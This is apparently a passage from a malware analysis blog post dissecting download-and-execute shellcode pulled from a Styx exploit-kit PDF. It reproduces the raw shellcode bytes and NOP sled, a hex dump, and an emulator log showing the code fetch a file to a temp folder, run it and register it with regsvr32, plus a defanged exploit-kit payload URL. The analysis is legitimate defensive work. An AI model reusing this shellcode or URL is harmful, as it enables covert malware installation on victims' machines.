^@^@^@^@]<83>í^E1Éd<8b>q0<8b>v^L<8b>v^\<8b>F^H<8b>~ <8b>6f9O^Xuò¾ï^@^@^@^Aî¿Ï^@^@^@^Aïè<80>^A^@^@<89>ê<81>Âï^@^@^@Rh<80>^@^@^@ÿ<95>Ï^@^@^@<89>ê<81>Âï^@^@^@1ö^AÂ<8a><9c>5^@^B^@^@<80>û^@t^F<88>^\2FëîÆ^D2^@<89>ê<81>Ââ^A^@^@Rÿ<95>Ó^@^@^@<89>ê<81>Âí^A^@^@RPÿ<95>×^@^@^@j^@j^@<89>ê<81>Âï^@^@^@R<89>ê<81>Â^K^B^@^@Rj^@ÿÐj^E<89>ê<81>Âï^@^@^@Rÿ<95>Û^@^@^@j^E<89>ê<81>Âã^@^@^@Rÿ<95>Û^@^@^@j^@ÿ<95>ß^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@regsvr32 -s GetTempPathA^@LoadLibraryA^@GetProcAddress^@WinExec^@ExitProcess^@»<89>ò<89>÷0À®uý)÷<89>ù1À¾<^@^@^@^Cµ¸^A^@^@f­^C<85>¸^A^@^@<8b>px<83>Æ^\^Cµ¸^A^@^@<8d>½¼^A^@^@­^C<85>¸^A^@^@«­^C<85>¸^A^@^@P«­^C<85>¸^A^@^@«^1Û­V^C<85>¸^A^@^@<89>Æ<89>×Qüó¦Yt^D^Cëé^<93>Ñà^C<85>Ä^A^@^@1ö<96>f­Áà^B^C<85>¼^A^@^@<89>Æ­^C<85>¸^A^@^@Ãë^P^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@<89><85>¸^A^@^@VWèXÿÿÿ_^«^AÎ<80>>»t^BëíÃURLMON.DLL^@URLDownloadToFileA^@User32.exe^@&h=03^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>



3. The shellcode/binary content


Lets look at a hex/ascii representation of the file:

0000000: c3a8 0000 0000 5dc2 83c3 ad05 31c3 8964  ......].....1..d
0000010: c28b 7130 c28b 760c c28b 761c c28b 4608  ..q0..v...v...F.
0000020: c28b 7e20 c28b 3666 394f 1875 c3b2 c2be  ..~ ..6f9O.u....
0000030: c3af 0000 0001 c3ae c2bf c38f 0000 0001  ................
0000040: c3af c3a8 c280 0100 00c2 89c3 aac2 81c3  ................
0000050: 82c3 af00 0000 5268 c280 0000 00c3 bfc2  ......Rh........
0000060: 95c3 8f00 0000 c289 c3aa c281 c382 c3af  ................
0000070: 0000 0031 c3b6 01c3 82c2 8ac2 9c35 0002  ...1.........5..
0000080: 0000 c280 c3bb 0074 06c2 881c 3246 c3ab  .......t....2F..
0000090: c3ae c386 0432 00c2 89c3 aac2 81c3 82c3  .....2..........
00000a0: a201 0000 52c3 bfc2 95c3 9300 0000 c289  ....R...........
00000b0: c3aa c281 c382 c3ad 0100 0052 50c3 bfc2  ...........RP...
00000c0: 95c3 9700 0000 6a00 6a00 c289 c3aa c281  ......j.j.......
00000d0: c382 c3af 0000 0052 c289 c3aa c281 c382  .......R........
00000e0: 0b02 0000 526a 00c3 bfc3 906a 05c2 89c3  ....Rj.....j....
00000f0: aac2 81c3 82c3 af00 0000 52c3 bfc2 95c3  ..........R.....
0000100: 9b00 0000 6a05 c289 c3aa c281 c382 c3a3  ....j...........
0000110: 0000 0052 c3bf c295 c39b 0000 006a 00c3  ...R.........j..
0000120: bfc2 95c3 9f00 0000 0000 0000 0000 0000  ................
0000130: 0000 0000 0000 0000 0000 0000 7265 6773  ............regs
0000140: 7672 3332 202d 7320 4765 7454 656d 7050  vr32 -s GetTempP
0000150: 6174 6841 004c 6f61 644c 6962 7261 7279  athA.LoadLibrary
0000160: 4100 4765 7450 726f 6341 6464 7265 7373  A.GetProcAddress
0000170: 0057 696e 4578 6563 0045 7869 7450 726f  .WinExec.ExitPro
0000180: 6365 7373 00c2 bbc2 89c3 b2c2 89c3 b730  cess...........0
0000190: c380 c2ae 75c3 bd29 c3b7 c289 c3b9 31c3  ....u..)......1.
00001a0: 80c2 be3c 0000 0003 c2b5 c2b8 0100 0066  ...<...........f
00001b0: c2ad 03c2 85c2 b801 0000 c28b 7078 c283  ............px..
00001c0: c386 1c03 c2b5 c2b8 0100 00c2 8dc2 bdc2  ................
00001d0: bc01 0000 c2ad 03c2 85c2 b801 0000 c2ab  ................
00001e0: c2ad 03c2 85c2 b801 0000 50c2 abc2 ad03  ..........P.....
00001f0: c285 c2b8 0100 00c2 ab5e 31c3 9bc2 ad56  .........^1....V
0000200: 03c2 85c2 b801 0000 c289 c386 c289 c397  ................
0000210: 51c3 bcc3 b3c2 a659 7404 5e43 c3ab c3a9  Q......Yt.^C....
0000220: 5ec2 93c3 91c3 a003 c285 c384 0100 0031  ^..............1
0000230: c3b6 c296 66c2 adc3 81c3 a002 03c2 85c2  ....f...........
0000240: bc01 0000 c289 c386 c2ad 03c2 85c2 b801  ................
0000250: 0000 c383 c3ab 1000 0000 0000 0000 0000  ................
0000260: 0000 0000 0000 00c2 89c2 85c2 b801 0000  ................
0000270: 5657 c3a8 58c3 bfc3 bfc3 bf5f 5ec2 ab01  VW..X......_^...
0000280: c38e c280 3ec2 bb74 02c3 abc3 adc3 8355  ....>..t.......U
0000290: 524c 4d4f 4e2e 444c 4c00 5552 4c44 6f77  RLMON.DLL.URLDow
00002a0: 6e6c 6f61 6454 6f46 696c 6541 0055 7365  nloadToFileA.Use
00002b0: 7233 322e 6578 6500 2668 3d30 3300 0000  r32.exe.&h=03...
00002c0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00002d0: 0000 0000 0000 0000 0000 0000 0000 0000  ................



We can see what will be performed. regsvr and dowload file. We can however not see from where the file is downloaded. Looks strange with that "h=03"? Does not look like XORed eather but lets see:

4. Emulating execution


Lets see if we can get more if we run the code:

$sctest -Ss 1000000000 < shell.bin

Hook me Captain Cook!
userhooks.c:108 user_hook_ExitProcess
ExitProcess(0)
stepcount 34540
[emu 0x0x8469078 ^[[31;1mdebug^[[0m ] cpu state    eip=0x004170cf
[emu 0x0x8469078 ^[[31;1mdebug^[[0m ] eax=0x00000020  ecx=0x0000000c  edx=0x004170e3  ebx=0x7c805800
[emu 0x0x8469078 ^[[31;1mdebug^[[0m ] esp=0x00416fce  ebp=0x00417000  esi=0x0000000a  edi=0x004170e3
[emu 0x0x8469078 ^[[31;1mdebug^[[0m ] Flags:
DWORD GetTempPathA (
     DWORD nBufferLength = 128;
     LPTSTR lpBuffer = 0x004170ef =>
           = "c:\tmp\";
) =  7;
HMODULE LoadLibraryA (
     LPCTSTR lpFileName = 0x004171e2 =>
           = "URLMON.DLL";
) = 0x7df20000;
FARPROC WINAPI GetProcAddress (
     HMODULE hModule = 0x7df20000 =>
         none;
     LPCSTR lpProcName = 0x004171ed =>
           = "URLDownloadToFileA";
) = 0x7df7b0bb;
HRESULT URLDownloadToFile (
     LPUNKNOWN pCaller = 0x00000000 =>
         none;
     LPCTSTR szURL = 0x0041720b =>
           = "&h=03";
     LPCTSTR szFileName = 0x004170ef =>
           = "c:\tmp\User32.exe";
     DWORD dwReserved = 0;
     LPBINDSTATUSCALLBACK lpfnCB = 0;
) =  0;
UINT WINAPI WinExec (
     LPCSTR lpCmdLine = 0x004170ef =>
           = "c:\tmp\User32.exe";
     UINT uCmdShow = 5;
) =  32;
UINT WINAPI WinExec (
     LPCSTR lpCmdLine = 0x004170e3 =>
           = "regsvr32 -s c:\tmp\User32.exe";
     UINT uCmdShow = 5;
) =  32;
void ExitProcess (
     UINT uExitCode = 0;
) =  0;



Nothing more. I guess the bad guys was too quick on this one, forgetting to add the full URL to the malware.


5. Epilogue


If we look at the Styx URL to EXE files:


hxxp: //rupscare.org/zNUdi611VKX0IDkq01jcK0dBBK0Q58F0rlJQ0HCzj0CaX90rFSv0076B01qoF05Oka0sF6F0xPVY16jTn17bNp0odl10d0TL0629S0F84i0FHxP0wT6105b9D0FEWS0Kr4U0swQx0ZdqR0Dw0B0wCUu0ZkH50rXuR0Uc7v0skdD0MhrU15SwC0iNDa0iOGF0HCX113Tui/xMCOakDS1p.exe?gO=aTtOki&h=11

we can see that the "g=03" fits into the picture and the assumption above should stick.


Happy Styx PDF peeling :)